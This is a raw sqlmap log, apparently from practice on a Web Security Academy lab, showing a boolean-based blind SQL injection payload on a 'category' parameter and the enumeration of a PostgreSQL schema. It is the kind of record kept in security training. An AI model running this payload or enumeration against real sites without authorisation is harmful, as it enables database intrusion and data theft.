        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 00:20:38 /2022-08-10/

[00:20:38] [INFO] using 'STDIN' for parsing targets list
[1/?] URL:
GET https://0a25009a04ff0561c009907600eb0072.web-security-academy.net/filter?category=Accessories
do you want to test this URL? [Y/n/q]
> Y
[00:20:38] [INFO] testing URL 'https://0a25009a04ff0561c009907600eb0072.web-security-academy.net/filter?category=Accessories'
[00:20:38] [INFO] resuming back-end DBMS 'postgresql' 
[00:20:38] [INFO] using '/home/kali/.local/share/sqlmap/output/results-08102022_1220am.csv' as the CSV results file in multiple targets mode
[00:20:38] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('session=A3ykj9O0s0O...Z0amPvxOnr'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: category=Accessories' AND 6830=6830 AND 'IwPS'='IwPS
---
do you want to exploit this SQL injection? [Y/n] Y
[00:20:39] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[00:20:39] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[00:20:39] [INFO] fetching database (schema) names
[00:20:39] [INFO] fetching number of databases
[00:20:39] [INFO] resumed: 3
[00:20:39] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[00:20:39] [INFO] retrieved: [00:20:40] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases

[00:20:41] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[00:20:41] [INFO] retrieved: 

[00:20:44] [INFO] retrieved: 
[00:20:46] [INFO] falling back to current database
[00:20:46] [INFO] fetching current database
[00:20:46] [INFO] resumed: public
[00:20:46] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
available databases [1]:
[*] public

[00:20:46] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 9 times
[00:20:46] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/kali/.local/share/sqlmap/output/results-08102022_1220am.csv'

[*] ending @ 00:20:46 /2022-08-10/

